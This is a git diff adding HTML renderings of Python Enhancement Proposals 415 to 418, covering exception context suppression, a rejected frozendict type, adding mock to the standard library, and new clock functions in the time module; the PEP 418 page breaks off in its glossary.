[3] “Porting Python 2 Code to Python 3” (the official porting guide): +https://docs.python.org/3/howto/pyporting.html
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0414.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0415/index.html b/pep-0415/index.html new file mode 100644 index 00000000000..67a29a283c8 --- /dev/null +++ b/pep-0415/index.html @@ -0,0 +1,198 @@ + PEP 415 – Implement context suppression with exception attributes | peps.python.org +
+
+


+ + +
+
+
+

PEP 415 – Implement context suppression with exception attributes

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
26-Feb-2012
+
Replaces:
+
409
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

PEP 409 introduced support for the raise exc from None construct to +allow the display of the exception context to be explicitly suppressed. +This PEP retains the language level changes already implemented in PEP 409, +but replaces the underlying implementation mechanism with a simpler approach +based on a new __suppress_context__ attribute on all BaseException +instances.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on the 14th of May, 2012.

+
+
+

Rationale

+

PEP 409 changes __cause__ to be Ellipsis by default. Then if +__cause__ is set to None by raise exc from None, no context or cause +will be printed should the exception be uncaught.

+

The main problem with this scheme is that it complicates the role of +__cause__. __cause__ should indicate the cause of the exception, not +whether __context__ should be printed or not. This use of __cause__ is +also not easily extended in the future. For example, we may someday want to +allow the programmer to select which of __context__ and __cause__ will +be printed. The PEP 409 implementation is not amenable to this.

+

The use of Ellipsis is a hack. Before PEP 409, Ellipsis was used +exclusively in extended slicing. Extended slicing has nothing to do with +exceptions, so it’s not clear to someone inspecting an exception object why +__cause__ should be set to Ellipsis. Using Ellipsis by default for +__cause__ makes it asymmetrical with __context__.

+
+
+

Proposal

+

A new attribute on BaseException, __suppress_context__, will +be introduced. Whenever __cause__ is set, __suppress_context__ +will be set to True. In particular, raise exc from cause +syntax will set exc.__suppress_context__ to True. Exception +printing code will check for that attribute to determine whether +context and cause will be printed. __cause__ will return to its +original purpose and values.

+

There is precedent for __suppress_context__ with the +print_line_and_file exception attribute.

+

To summarize, raise exc from cause will be equivalent to:

+
exc.__cause__ = cause
+raise exc
+
+
+

where exc.__cause__ = cause implicitly sets +exc.__suppress_context__.
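The resulting behaviour can be illustrated with a short example (as +implemented in Python 3.3+):

try:
+    try:
+        1 / 0
+    except ZeroDivisionError:
+        # "from None" sets __cause__ and thereby __suppress_context__
+        raise KeyError("lookup failed") from None
+except KeyError as exc:
+    print(exc.__context__)           # ZeroDivisionError(...): still recorded
+    print(exc.__cause__)             # None
+    print(exc.__suppress_context__)  # True: the context is not displayed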

+
+
+

Patches

+

There is a patch on Issue 14133.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0415.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0416/index.html b/pep-0416/index.html new file mode 100644 index 00000000000..977868ca23e --- /dev/null +++ b/pep-0416/index.html @@ -0,0 +1,350 @@ + PEP 416 – Add a frozendict builtin type | peps.python.org +
+
+


+ + +
+
+
+

PEP 416 – Add a frozendict builtin type

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Feb-2012
+
Python-Version:
+
3.3
+
+
+
+
+
+

Rejection Notice

+

I’m rejecting this PEP. A number of reasons (not exhaustive):

+
    +
  • According to Raymond Hettinger, use of frozendict is low. Those +that do use it tend to use it as a hint only, such as declaring +global or class-level “constants”: they aren’t really immutable, +since anyone can still assign to the name.
  • +
  • There are existing idioms for avoiding mutable default values.
  • +
  • The potential of optimizing code using frozendict in PyPy is +unsure; a lot of other things would have to change first. The same +holds for compile-time lookups in general.
  • +
  • Multiple threads can agree by convention not to mutate a shared +dict, there’s no great need for enforcement. Multiple processes +can’t share dicts.
  • +
  • Adding a security sandbox written in Python, even with a limited +scope, is frowned upon by many, due to the inherent difficulty with +ever proving that the sandbox is actually secure. Because of this +we won’t be adding one to the stdlib any time soon, so this use +case falls outside the scope of a PEP.
  • +
+

On the other hand, exposing the existing read-only dict proxy as a +built-in type sounds good to me. (It would need to be changed to +allow calling the constructor.) GvR.

+

Update (2012-04-15): A new MappingProxyType type was added to the types +module of Python 3.3.
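For example, with the type that was eventually added:

from types import MappingProxyType
+
+config = {"debug": False}
+proxy = MappingProxyType(config)
+proxy["debug"]            # False: reads work like a normal mapping
+# proxy["debug"] = True   # would raise TypeError: item assignment unsupported
+config["debug"] = True    # the proxy is a view, not a copy...
+proxy["debug"]            # ...so the change is visible: True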

+
+
+

Abstract

+

Add a new frozendict builtin type.

+
+
+

Rationale

+

A frozendict is a read-only mapping: a key cannot be added nor removed, and a +key is always mapped to the same value. However, frozendict values are not +required to be hashable. A frozendict is hashable if and only if all values +are hashable.

+

Use cases:

+
    +
  • Immutable global variable like a default configuration.
  • +
  • Default value of a function parameter. Avoid the issue of mutable default +arguments.
  • +
  • Implement a cache: frozendict can be used to store function keywords. +frozendict can be used as a key of a mapping or as a member of set.
  • +
  • frozendict avoids the need of a lock when the frozendict is shared +by multiple threads or processes, especially hashable frozendict. It would +also help to prohibit coroutines (generators + greenlets) from modifying the +global state.
  • +
  • frozendict lookup can be done at compile time instead of runtime because the +mapping is read-only. frozendict can be used instead of a preprocessor to +remove conditional code at compilation, like code specific to a debug build.
  • +
  • frozendict helps to implement read-only object proxies for security modules. +For example, it would be possible to use frozendict type for __builtins__ +mapping or type.__dict__. This is possible because frozendict is compatible +with the PyDict C API.
  • +
  • frozendict avoids the need of a read-only proxy in some cases. frozendict is +faster than a proxy because getting an item in a frozendict is a fast lookup +whereas a proxy requires a function call.
  • +
+
+
+

Constraints

+
    +
  • frozendict has to implement the Mapping abstract base class
  • +
  • frozendict keys and values can be unorderable
  • +
  • a frozendict is hashable if all keys and values are hashable
  • +
  • frozendict hash does not depend on the items creation order
  • +
+
+
+

Implementation

+
    +
  • Add a PyFrozenDictObject structure based on PyDictObject with an extra +“Py_hash_t hash;” field
  • +
  • frozendict.__hash__() is implemented using hash(frozenset(self.items())) and +caches the result in its private hash attribute
  • +
  • Register frozendict as a collections.abc.Mapping
  • +
  • frozendict can be used with PyDict_GetItem(), but PyDict_SetItem() and +PyDict_DelItem() raise a TypeError
  • +
+
+
+

Recipe: hashable dict

+

To ensure that a frozendict is hashable, values can be checked +before creating the frozendict:

+
def hashabledict(*args, **kw):
+    # ensure that all values are hashable before creating the frozendict
+    items = dict(*args, **kw).items()
+    for key, value in items:
+        if isinstance(value, (int, str, bytes, float, frozenset, complex)):
+            # skip computing the hash (which may be slow) for builtin
+            # types known to be hashable for any value
+            continue
+        hash(value)  # raises TypeError if the value is not hashable
+        # don't check the key: frozendict already checks the key
+    return frozendict(items)
+
+
+
+
+

Objections

+

namedtuple may fit the requirements of a frozendict.

+

A namedtuple is not a mapping, it does not implement the Mapping abstract base +class.

+

“frozendict can be implemented in Python using descriptors” and “frozendict +just needs to be practically constant”.

+

If frozendict is used to harden Python (security purpose), it must be +implemented in C. A type implemented in C is also faster.

+

PEP 351 was rejected.

+

PEP 351 tried to freeze an object and so may convert a mutable object to an +immutable object (using a different type). frozendict doesn’t convert anything: +hash(frozendict) raises a TypeError if a value is not hashable. Freezing an +object is not the purpose of this PEP.

+
+
+

Alternative: dictproxy

+

Python has a builtin dictproxy type used by the type.__dict__ getter descriptor. +This type is not public. dictproxy is a read-only view of a dictionary, but it +is not a read-only mapping: if the underlying dictionary is modified, the +dictproxy is also modified.

+

A dictproxy can be created using ctypes and the Python C API; see for example +the make dictproxy object via ctypes.pythonapi and type() (Python recipe 576540) +by Ikkei Shimomura. The recipe contains a test checking that a dictproxy is +“mutable” (modifying the dictionary linked to the dictproxy).

+

However, dictproxy can be useful in cases where its mutability is not an +issue, to avoid copying the dictionary.

+
+
+

Existing implementations

+

Whitelist approach.

+
    +
  • Implementing an Immutable Dictionary (Python recipe 498072) by Aristotelis Mikropoulos. +Similar to frozendict except that it is not truly read-only: it is possible +to access its private internal dict. It does not implement __hash__ and +has an implementation issue: it is possible to call __init__() again to +modify the mapping.
  • +
  • PyWebmail contains an ImmutableDict type: webmail.utils.ImmutableDict. +It is hashable if keys and values are hashable. It is not truly read-only: +its internal dict is a public attribute.
  • +
  • remember project: remember.dicts.FrozenDict. +It is used to implement a cache: FrozenDict is used to store function callbacks. +FrozenDict may be hashable. It has an extra supply_dict() class method to +create a FrozenDict from a dict without copying the dict: store the dict as +the internal dict. Implementation issue: __init__() can be called to modify +the mapping and the hash may differ depending on item creation order. The +mapping is not truly read-only: the internal dict is accessible in Python.
  • +
+

Blacklist approach: inherit from dict and override write methods to raise an +exception. It is not truly read-only: it is still possible to call dict methods +on such “frozen dictionary” to modify it.

+ +

Hashable dict: inherit from dict and just add an __hash__ method.

+ +
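Minimal sketches of these last two approaches, with the caveats noted above +(illustrative only):

class FrozenDict(dict):
+    # blacklist approach: override the write methods to raise an exception.
+    # Not truly read-only: dict.__setitem__(fd, key, value) still bypasses it.
+    def _readonly(self, *args, **kwargs):
+        raise TypeError("FrozenDict is read-only")
+    __setitem__ = __delitem__ = _readonly
+    clear = pop = popitem = setdefault = update = _readonly
+
+class HashableDict(dict):
+    # hashable dict: inherit from dict and just add an __hash__ method
+    def __hash__(self):
+        return hash(frozenset(self.items()))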
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0416.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0417/index.html b/pep-0417/index.html new file mode 100644 index 00000000000..d6ebc1cd56f --- /dev/null +++ b/pep-0417/index.html @@ -0,0 +1,198 @@ + PEP 417 – Including mock in the Standard Library | peps.python.org +
+
+


+ + +
+
+
+

PEP 417 – Including mock in the Standard Library

+
+
Author:
+
Michael Foord <michael at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Mar-2012
+
Python-Version:
+
3.3
+
Post-History:
+
12-Mar-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP proposes adding the mock [1] testing library +to the Python standard library as unittest.mock.

+
+
+

Rationale

+

Creating mock objects for testing is a common need in Python. +Many developers create ad-hoc mocks, as needed, in their test +suites. This is currently what we do in the Python test suite, +where a standardised mock object library would be helpful.

+

There are many mock object libraries available for Python [2]. +Of these, mock is overwhelmingly the most popular, with as many +downloads on PyPI as the other mocking libraries combined.

+

An advantage of mock is that it is a mocking library and not a +framework. It provides a configurable and flexible mock object, +without being opinionated about how you write your tests. The +mock API is now battle-tested and stable.

+

mock also safely handles monkeypatching and unmonkeypatching +objects for the duration of a test. This is hard to do safely, +and many developers / projects mimic this functionality +(often incorrectly). A standardised way to do this, handling +the complexity of patching in the presence of the descriptor +protocol (etc.), is useful. People are asking for a “patch” [3] +feature in unittest. Doing this via mock.patch is preferable +to re-implementing part of this functionality in unittest.
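A brief example of the patching behaviour described above, using the +unittest.mock spelling the module gained on inclusion:

from unittest import mock
+import os
+
+with mock.patch("os.getcwd", return_value="/fake/dir") as fake_getcwd:
+    assert os.getcwd() == "/fake/dir"    # patched inside the block
+    fake_getcwd.assert_called_once_with()
+
+assert os.getcwd() != "/fake/dir"        # automatically unpatched afterwards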

+
+
+

Background

+

Addition of mock to the Python standard library was discussed +and agreed to at the Python Language Summit 2012.

+
+
+

Open Issues

+

As of release 0.8, which is current at the time of writing, +mock is compatible with Python 2.4-3.2. Moving into the Python +standard library will allow for the removal of some Python 2 +specific “compatibility hacks”.

+

mock 0.8 introduced a new feature, “auto-speccing”, which obsoletes +an older mock feature called “mocksignature”. The +“mocksignature” functionality can be removed from mock +altogether prior to inclusion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0417.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0418/index.html b/pep-0418/index.html new file mode 100644 index 00000000000..f7ca29f6100 --- /dev/null +++ b/pep-0418/index.html @@ -0,0 +1,2179 @@ + PEP 418 – Add monotonic time, performance counter, and process time functions | peps.python.org +
+
+


+ + +
+
+
+

PEP 418 – Add monotonic time, performance counter, and process time functions

+
+
Author:
+
Cameron Simpson <cs at cskk.id.au>, +Jim J. Jewett <jimjjewett at gmail.com>, +Stephen J. Turnbull <stephen at xemacs.org>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Mar-2012
+
Python-Version:
+
3.3
+
+
+
+
+
+

Abstract

+

This PEP proposes to add time.get_clock_info(name), +time.monotonic(), time.perf_counter() and +time.process_time() functions to Python 3.3.

+
+
+

Rationale

+

If a program uses the system time to schedule events or to implement +a timeout, it may fail to run events at the right moment or stop the +timeout too early or too late when the system time is changed manually or +adjusted automatically by NTP. A monotonic clock, time.monotonic(), should +be used instead so that the program is not affected by system time updates.

+

To measure the performance of a function, time.clock() can be used, +but it is very different on Windows and on Unix. On Windows, +time.clock() includes time elapsed during sleep, whereas it does +not on Unix. time.clock() resolution is very good on Windows, but +very bad on Unix. The new time.perf_counter() function should be +used instead to always get the most precise performance counter with +portable behaviour (e.g. including time spent during sleep).

+

Until now, Python did not directly provide a portable +function to measure CPU time. time.clock() can be used on Unix, +but it has poor +resolution. resource.getrusage() or os.times() can also be +used on Unix, but they require computing the sum of the time +spent in kernel space and user space. The new time.process_time() +function acts as a portable counter that always measures CPU time +(excluding time elapsed during sleep) and has the best available +resolution.
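The difference between the wall-clock counter and the CPU-time counter can +be seen in a few lines:

import time
+
+t0, c0 = time.perf_counter(), time.process_time()
+time.sleep(1)        # wall time advances, CPU time (almost) does not
+sum(range(10**6))    # both counters advance while computing
+t1, c1 = time.perf_counter(), time.process_time()
+print(t1 - t0)   # slightly more than 1 second: the sleep is included
+print(c1 - c0)   # only the CPU time of the computation: sleep excluded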

+

Each operating system implements clocks and performance counters +differently, and it is useful to know exactly which function is used +and some properties of the clock like its resolution. The new +time.get_clock_info() function gives access to all available +information about each Python time function.

+

New functions:

+
    +
  • time.monotonic(): timeout and scheduling, not affected by system +clock updates
  • +
  • time.perf_counter(): benchmarking, most precise clock for short +period
  • +
  • time.process_time(): profiling, CPU time of the process
  • +
+

Users of new functions:

+
    +
  • time.monotonic(): concurrent.futures, multiprocessing, queue, subprocess, +telnet and threading modules to implement timeout
  • +
  • time.perf_counter(): trace and timeit modules, pybench program
  • +
  • time.process_time(): profile module
  • +
  • time.get_clock_info(): pybench program to display information about the +timer like the resolution
  • +
+

The time.clock() function is deprecated because it is not +portable: it behaves differently depending on the operating system. +time.perf_counter() or time.process_time() should be used +instead, depending on your requirements. time.clock() is marked as +deprecated but is not planned for removal.

+

Limitations:

+
    +
  • The behaviour of clocks after a system suspend is not defined in the +documentation of new functions. The behaviour depends on the +operating system: see the Monotonic Clocks section below. Some +recent operating systems provide two clocks, one including time +elapsed during system suspend, one not including this time. Most +operating systems only provide one kind of clock.
  • +
  • time.monotonic() and time.perf_counter() may or may not be adjusted. +For example, CLOCK_MONOTONIC is slewed on Linux, whereas +GetTickCount() is not adjusted on Windows. +time.get_clock_info('monotonic')['adjustable'] can be used to check +if the monotonic clock is adjustable or not.
  • +
  • No time.thread_time() function is proposed by this PEP because it is +neither needed by the Python standard library nor a commonly requested +feature. Such a function would only be available on Windows and Linux. On +Linux, it is possible to use +time.clock_gettime(CLOCK_THREAD_CPUTIME_ID). On Windows, ctypes or +another module can be used to call the GetThreadTimes() +function.
  • +
+
+
+

Python functions

+
+

New Functions

+
+

time.get_clock_info(name)

+

Get information on the specified clock. Supported clock names:

+
    +
  • "clock": time.clock()
  • +
  • "monotonic": time.monotonic()
  • +
  • "perf_counter": time.perf_counter()
  • +
  • "process_time": time.process_time()
  • +
  • "time": time.time()
  • +
+

Return a time.clock_info object which has the following attributes:

+
    +
  • implementation (str): name of the underlying operating system +function. Examples: "QueryPerformanceCounter()", +"clock_gettime(CLOCK_REALTIME)".
  • +
  • monotonic (bool): True if the clock cannot go backward.
  • +
  • adjustable (bool): True if the clock can be changed automatically +(e.g. by a NTP daemon) or manually by the system administrator, False +otherwise
  • +
  • resolution (float): resolution in seconds of the clock.
  • +
+
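For example, on a typical Linux system the call reports something like the +following (exact values vary by platform and kernel):

import time
+info = time.get_clock_info('monotonic')
+# e.g. clock_info(implementation='clock_gettime(CLOCK_MONOTONIC)',
+#                 monotonic=True, adjustable=False, resolution=1e-09)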
+
+

time.monotonic()

+

Monotonic clock, i.e. cannot go backward. It is not affected by system +clock updates. The reference point of the returned value is +undefined, so that only the difference between the results of +consecutive calls is valid and is a number of seconds.

+

On Windows versions older than Vista, time.monotonic() detects +GetTickCount() integer overflow (32 bits, roll-over after 49.7 +days). It increases an internal epoch (reference time) by 2**32 +each time that an overflow is detected. The epoch is stored +in the process-local state and so +the value of time.monotonic() may be different in two Python +processes running for more than 49 days. On more recent versions of +Windows and on other operating systems, time.monotonic() is +system-wide.

+

Availability: Windows, Mac OS X, Linux, FreeBSD, OpenBSD, Solaris. +Not available on GNU/Hurd.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    # GetTickCount64() requires Windows Vista, Server 2008 or later
+    if hasattr(_time, 'GetTickCount64'):
+        def monotonic():
+            return _time.GetTickCount64() * 1e-3
+    else:
+        def monotonic():
+            ticks = _time.GetTickCount()
+            if ticks < monotonic.last:
+                # Integer overflow detected
+                monotonic.delta += 2**32
+            monotonic.last = ticks
+            return (ticks + monotonic.delta) * 1e-3
+        monotonic.last = 0
+        monotonic.delta = 0
+
+elif sys.platform == 'darwin':
+    def monotonic():
+        if monotonic.factor is None:
+            timebase = _time.mach_timebase_info()
+            monotonic.factor = timebase[0] / timebase[1] * 1e-9
+        return _time.mach_absolute_time() * monotonic.factor
+    monotonic.factor = None
+
+elif hasattr(time, "clock_gettime") and hasattr(time, "CLOCK_HIGHRES"):
+    def monotonic():
+        return time.clock_gettime(time.CLOCK_HIGHRES)
+
+elif hasattr(time, "clock_gettime") and hasattr(time, "CLOCK_MONOTONIC"):
+    def monotonic():
+        return time.clock_gettime(time.CLOCK_MONOTONIC)
+
+
+

On Windows, QueryPerformanceCounter() is not used even though it +has a better resolution than GetTickCount(). It is not reliable +and has too many issues.

+
+
+

time.perf_counter()

+

Performance counter with the highest available resolution to measure a +short duration. It does include time elapsed during sleep and is +system-wide. The reference point of the returned value is undefined, +so that only the difference between the results of consecutive calls +is valid and is a number of seconds.

+

It is available on all platforms.

+

Pseudo-code:

+
if os.name == 'nt':
+    def _win_perf_counter():
+        if _win_perf_counter.frequency is None:
+            _win_perf_counter.frequency = _time.QueryPerformanceFrequency()
+        return _time.QueryPerformanceCounter() / _win_perf_counter.frequency
+    _win_perf_counter.frequency = None
+
+def perf_counter():
+    if perf_counter.use_performance_counter:
+        try:
+            return _win_perf_counter()
+        except OSError:
+            # QueryPerformanceFrequency() fails if the installed
+            # hardware does not support a high-resolution performance
+            # counter
+            perf_counter.use_performance_counter = False
+    if perf_counter.use_monotonic:
+        # The monotonic clock is preferred over the system time
+        try:
+            return time.monotonic()
+        except OSError:
+            perf_counter.use_monotonic = False
+    return time.time()
+perf_counter.use_performance_counter = (os.name == 'nt')
+perf_counter.use_monotonic = hasattr(time, 'monotonic')
+
+
+
+
+

time.process_time()

+

Sum of the system and user CPU time of the current process. It does +not include time elapsed during sleep. It is process-wide by +definition. The reference point of the returned value is undefined, +so that only the difference between the results of consecutive calls +is valid.

+

It is available on all platforms.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    def process_time():
+        handle = _time.GetCurrentProcess()
+        process_times = _time.GetProcessTimes(handle)
+        return (process_times['UserTime'] + process_times['KernelTime']) * 1e-7
+else:
+    try:
+        import resource
+    except ImportError:
+        has_resource = False
+    else:
+        has_resource = True
+
+    def process_time():
+        if process_time.clock_id is not None:
+            try:
+                return time.clock_gettime(process_time.clock_id)
+            except OSError:
+                process_time.clock_id = None
+        if process_time.use_getrusage:
+            try:
+                usage = resource.getrusage(resource.RUSAGE_SELF)
+                return usage[0] + usage[1]
+            except OSError:
+                process_time.use_getrusage = False
+        if process_time.use_times:
+            try:
+                times = _time.times()
+                cpu_time = times.tms_utime + times.tms_stime
+                return cpu_time / process_time.ticks_per_seconds
+            except OSError:
+                process_time.use_times = False
+        return _time.clock()
+    if (hasattr(time, 'clock_gettime')
+        and hasattr(time, 'CLOCK_PROF')):
+        process_time.clock_id = time.CLOCK_PROF
+    elif (hasattr(time, 'clock_gettime')
+          and hasattr(time, 'CLOCK_PROCESS_CPUTIME_ID')):
+        process_time.clock_id = time.CLOCK_PROCESS_CPUTIME_ID
+    else:
+        process_time.clock_id = None
+    process_time.use_getrusage = has_resource
+    process_time.use_times = hasattr(_time, 'times')
+    if process_time.use_times:
+        # sysconf("SC_CLK_TCK"), or the HZ constant, or 60
+        process_time.ticks_per_seconds = _time.ticks_per_seconds
+
+
+
+
+
+

Existing Functions

+
+

time.time()

+

The system time which is usually the civil time. It is system-wide by +definition. It can be set manually by the system administrator or +automatically by a NTP daemon.

+

It is available on all platforms and cannot fail.

+

Pseudo-code [2]:

+
if os.name == "nt":
+    def time():
+        return _time.GetSystemTimeAsFileTime()
+else:
+    def time():
+        if hasattr(time, "clock_gettime"):
+            try:
+                return time.clock_gettime(time.CLOCK_REALTIME)
+            except OSError:
+                # CLOCK_REALTIME is not supported (unlikely)
+                pass
+        if hasattr(_time, "gettimeofday"):
+            try:
+                return _time.gettimeofday()
+            except OSError:
+                # gettimeofday() should not fail
+                pass
+        if hasattr(_time, "ftime"):
+            return _time.ftime()
+        else:
+            return _time.time()
+
+
+
+
+

time.sleep()

+

Suspend execution for the given number of seconds. The actual +suspension time may be less than that requested because any caught +signal will terminate the time.sleep() following execution of that +signal’s catching routine. Also, the suspension time may be longer +than requested by an arbitrary amount because of the scheduling of +other activity in the system.

+

Pseudo-code [2]:

+
try:
+    import select
+except ImportError:
+    has_select = False
+else:
+    has_select = hasattr(select, "select")
+
+if has_select:
+    def sleep(seconds):
+        return select.select([], [], [], seconds)
+
+elif hasattr(_time, "delay"):
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        _time.delay(milliseconds)
+
+elif os.name == "nt":
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        win32api.ResetEvent(sleep.sigint_event)
+        win32api.WaitForSingleObject(sleep.sigint_event, milliseconds)
+
+    sleep.sigint_event = win32api.CreateEvent(NULL, TRUE, FALSE, FALSE)
+    # SetEvent(sleep.sigint_event) will be called by the signal handler of SIGINT
+
+elif os.name == "os2":
+    def sleep(seconds):
+        milliseconds = int(seconds * 1000)
+        DosSleep(milliseconds)
+
+else:
+    def sleep(seconds):
+        seconds = int(seconds)
+        _time.sleep(seconds)
+
+
+
+
+
+

Deprecated Function

+
+

time.clock()

+

On Unix, return the current processor time as a floating point number +expressed in seconds. It is process-wide by definition. The resolution, +and in fact the very definition of the meaning of “processor time”, +depends on that of the C function of the same name, but in any case, +this is the function to use for benchmarking Python or timing +algorithms.

+

On Windows, this function returns wall-clock seconds elapsed since the +first call to this function, as a floating point number, based on the +Win32 function QueryPerformanceCounter(). The resolution is +typically better than one microsecond. It is system-wide.

+

Pseudo-code [2]:

+
if os.name == 'nt':
+    def clock():
+        try:
+            return _win_perf_counter()
+        except OSError:
+            # QueryPerformanceFrequency() fails if the installed
+            # hardware does not support a high-resolution performance
+            # counter
+            pass
+        return _time.clock()
+else:
+    clock = _time.clock
+
+
+
+
+
+
+

Alternatives: API design

+
+

Other names for time.monotonic()

+
    +
  • time.counter()
  • +
  • time.metronomic()
  • +
  • time.seconds()
  • +
  • time.steady(): “steady” is ambiguous: it means different things to +different people. For example, on Linux, CLOCK_MONOTONIC is +adjusted. If we use the real time as the reference clock, we may +say that CLOCK_MONOTONIC is steady. But CLOCK_MONOTONIC stops +during system suspend, whereas real time includes any time +spent in suspend.
  • +
  • time.timeout_clock()
  • +
  • time.wallclock(): time.monotonic() is not the system time aka the +“wall clock”, but a monotonic clock with an unspecified starting +point.
  • +
+

The name “time.try_monotonic()” was also proposed for an older +version of time.monotonic() which would fall back to the system +time when no monotonic clock was available.

+
+
+

Other names for time.perf_counter()

+
    +
  • time.high_precision()
  • +
  • time.highres()
  • +
  • time.hires()
  • +
  • time.performance_counter()
  • +
  • time.timer()
  • +
+
+
+

Only expose operating system clocks

+

To not have to define high-level clocks, which is a difficult task, a +simpler approach is to only expose operating system clocks. +time.clock_gettime() and related clock identifiers were already added +to Python 3.3 for example.

+
+
+

time.monotonic(): Fallback to system time

+

If no monotonic clock is available, time.monotonic() falls back to the +system time.

+

Issues:

+
    +
  • It is hard to define such a function correctly in the documentation: +is it monotonic? Is it steady? Is it adjusted?
  • +
  • Some users want to decide what to do when no monotonic clock is +available: use another clock, display an error, or do something +else.
  • +
+

Different APIs were proposed to define such a function.

+
+

One function with a flag: time.monotonic(fallback=True)

+
    +
  • time.monotonic(fallback=True) falls back to the system time if no +monotonic clock is available or if the monotonic clock failed.
  • +
  • time.monotonic(fallback=False) raises OSError if monotonic clock +fails and NotImplementedError if the system does not provide a +monotonic clock
  • +
+

A keyword argument that gets passed as a constant in the caller is +usually a sign of poor API design.

+

Raising NotImplementedError for a function is something uncommon in +Python and should be avoided.

+
+
+

One time.monotonic() function, no flag

+

time.monotonic() returns (time: float, is_monotonic: bool).

+

An alternative is to use a function attribute: +time.monotonic.is_monotonic. The attribute value would be None before +the first call to time.monotonic().

+
+
+
+

Choosing the clock from a list of constraints

+

The PEP as proposed offers a few new clocks, but their guarantees +are deliberately loose in order to offer useful clocks on different +platforms. This inherently embeds policy in the calls, and the +caller must thus choose a policy.

+

The “choose a clock” approach suggests an additional API to let +callers implement their own policy if necessary +by making most platform clocks available and letting the caller pick amongst them. +The PEP’s suggested clocks are still expected to be available for the common +simple use cases.

+

To do this two facilities are needed: +an enumeration of clocks, and metadata on the clocks to enable the user to +evaluate their suitability.

+

The primary interface is a function that makes simple choices easy: +the caller can use time.get_clock(*flags) with some combination of flags. +This includes at least:

+
    +
  • time.MONOTONIC: clock cannot go backward
  • +
  • time.STEADY: clock rate is steady
  • +
  • time.ADJUSTED: clock may be adjusted, for example by NTP
  • +
  • time.HIGHRES: clock with the highest resolution
  • +
+

It returns a clock object with a .now() method returning the current time. +The clock object is annotated with metadata describing the clock feature set; +its .flags field will contain at least all the requested flags.

+

time.get_clock() returns None if no matching clock is found and so calls can +be chained using the or operator. Example of a simple policy decision:

+
T = get_clock(MONOTONIC) or get_clock(STEADY) or get_clock()
+t = T.now()
+
+
+

The available clocks always at least include a wrapper for time.time(), +so a final call with no flags can always be used to obtain a working clock.

+

Examples of flags of system clocks:

+
    +
  • QueryPerformanceCounter: MONOTONIC | HIGHRES
  • +
  • GetTickCount: MONOTONIC | STEADY
  • +
  • CLOCK_MONOTONIC: MONOTONIC | STEADY (or only MONOTONIC on Linux)
  • +
  • CLOCK_MONOTONIC_RAW: MONOTONIC | STEADY
  • +
  • gettimeofday(): (no flag)
  • +
+

The clock objects contain other metadata including the clock flags +with additional feature flags above those listed above, the name +of the underlying OS facility, and clock precisions.

+

time.get_clock() still chooses a single clock; an enumeration +facility is also required. +The most obvious method is to offer time.get_clocks() with the +same signature as time.get_clock(), but returning a sequence +of all clocks matching the requested flags. +Requesting no flags would thus enumerate all available clocks, +allowing the caller to make an arbitrary choice amongst them based +on their metadata.
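A sketch of how such selection functions might work (this API was only a +proposal and was never adopted; ALL_CLOCKS and the clock objects’ flags +attribute are hypothetical):

def get_clock(flags=0, clocks=ALL_CLOCKS):
+    for clock in clocks:
+        # a clock matches when it offers every requested feature flag
+        if clock.flags & flags == flags:
+            return clock
+    return None    # enables chaining: get_clock(X) or get_clock(Y)
+
+def get_clocks(flags=0, clocks=ALL_CLOCKS):
+    # enumeration variant: all clocks matching the requested flags
+    return [clock for clock in clocks if clock.flags & flags == flags]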

+

Example partial implementation: +clockutils.py.

+
+
+

Working around operating system bugs?

+

Should Python ensure that a monotonic clock is truly +monotonic by computing the maximum of the current clock value and the +previous value?

+

Since it’s relatively straightforward to cache the last value returned +using a static variable, it might be interesting to use this to make +sure that the values returned are indeed monotonic.
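Such a workaround could look like the following sketch (raw_monotonic() +stands in for whatever OS clock is used; this is not part of the proposal):

_last = 0.0
+
+def clamped_monotonic():
+    # never return a value smaller than the largest one already returned
+    global _last
+    _last = max(_last, raw_monotonic())
+    return _last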

+
    +
  • Virtual machines provide less reliable clocks.
  • +
  • QueryPerformanceCounter() has known bugs (only one is not fixed yet)
  • +
+

Python may only work around a specific known operating system bug: +KB274323 contains a code example to work around the bug (use +GetTickCount() to detect QueryPerformanceCounter() leaps).

+

Issues with “correcting” non-monotonicities:

+
    +
  • if the clock is accidentally set forward by an hour and then back +again, you wouldn’t have a useful clock for an hour
  • +
  • the cache is not shared between processes so different processes +wouldn’t see the same clock value
  • +
+
+
+
+

Glossary

+
+
Accuracy:
+
The amount of deviation of measurements by a given instrument from +true values. See also Accuracy and precision. +Inaccuracy in clocks may be caused by lack of precision, drift, or an +incorrect initial setting of the clock (e.g., timing of threads is +inherently inaccurate because perfect synchronization in resetting +counters is quite difficult).
+
Adjusted:
+
Resetting a clock to the correct time. This may be done either +with a <Step> or by <Slewing>.
+
Civil Time:
+
Time of day; external to the system. 10:45:13am is a Civil time; +45 seconds is not. Provided by existing function +time.localtime() and time.gmtime(). Not changed by this +PEP.
+
Clock:
+
